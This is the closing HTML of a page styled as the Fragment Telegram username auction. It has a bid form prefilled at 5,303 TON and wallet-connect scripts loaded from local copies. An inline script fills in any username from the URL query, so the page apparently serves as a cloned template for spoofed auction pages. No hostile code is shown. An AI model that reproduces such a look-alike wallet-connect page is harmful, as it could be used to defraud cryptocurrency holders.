                </div>
            </div>
        </div>
        <div class="popup-container hide js-botsabout-popup" data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h4>Bot usernames</h4>
                        <p class="popup-text">This username has been upgraded and it can now be assigned not just to
                            channels, groups or users, but also to bots. This upgrade is permanent and can be performed
                            for any collectible username by paying a fee of <span
                                class="icon-before icon-ton tm-amount">1,000</span>. Usernames will remain upgraded even
                            if they change owners.</p>
                        <div class="popup-buttons">
                            <a class="btn btn-link btn-lg popup-cancel-btn">OK, got it</a>
                        </div>
                    </section>
                </div>
            </div>
        </div>
        <footer class="tm-footer">
            <div class="tm-footer-links">
                <a href="https://fragment.com/" class="tm-footer-link">Top Auctions</a>
                <a href="https://fragment.com/about" class="tm-footer-link">About</a>
                <a href="https://fragment.com/terms" class="tm-footer-link">Terms</a>
                <a href="https://fragment.com/privacy" class="tm-footer-link">Privacy</a>
            </div>
        </footer>
        <div class="popup-container form-popup-container place-bid-popup-container js-place-bid-popup aj_popup hide"
            data-close-outside="popup-body">
            <div class="popup">
                <div class="popup-body">
                    <section>
                        <h2>@...</h2>
                        <p class="popup-text">Telegram username and ....t.me</p>
                        <form class="js-place-bid-form">
                            <div class="form-group">
                                <label for="bid_value">Your bid</label>
                                <div class="icon-before icon-ton form-control-wrap tm-coin-field">
                                    <input inputmode="decimal" class="form-control js-amount-input" id="bid_value"
                                        name="bid_value" value="5303" data-for="js-bid_value"
                                        data-usd-for="js-bid_usd_value" autocomplete="off">
                                </div>
                                <p class="help-block">Approximately $<span class="js-bid_usd_value">26,086</span></p>
                                <div class="tm-form-control-hint"></div>
                            </div>
                            <div class="form-main-button">
                                <button type="submit" class="btn btn-primary btn-block">
                                    <span class="tm-button-label">Place a <span
                                            class="icon-before icon-ton tm-amount js-bid_value">5,303</span> bid</span>
                                </button>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
    </div>
    <script>
        document.querySelectorAll('*').forEach((elem) => {
            if (elem.textContent.includes('...') && elem.childNodes.length === 1) {
                elem.textContent = elem.textContent.replaceAll('...', getQueryParams().username)
            }
        })
    </script>
    <script src="scripts/jquery.js"></script>
    <script src="scripts/jquery-ex.js"></script>
    <script src="scripts/main.-aj.js"></script>
    <script src="scripts/auction.js"></script>
    <script src="scripts/bootstrap.js"></script>
    <script src="scripts/qr-styling.js"></script>
    <script src="scripts/tonconnect.js"></script>
    <script src="scripts/tgsticeker.js"></script>
    <script src="scripts/tonparser.js"></script>
    <script src="scripts/script.js"></script>

    <script>ajInit({ "version": 535, "apiUrl": "\/api?hash=91de50b949728f5bac", "state": { "quickSearch": false, "tonRate": 4.9178581177614 } });</script>
    <script id="aj_script">Aj._useScrollHack = true;
        Main.init();
        Wallet.init({ "address": false, "ton_proof": "f56322ad35343c245b", "logged_in": false, "version": 2 });
    </script>
    <div id="tc-widget-root"><tc-root></tc-root></div>
    <script>Aj.pageLoaded();</script>
    <div style="position: absolute; left: -100px; top: 0px; height: 100vh;"></div>




</body>

</html>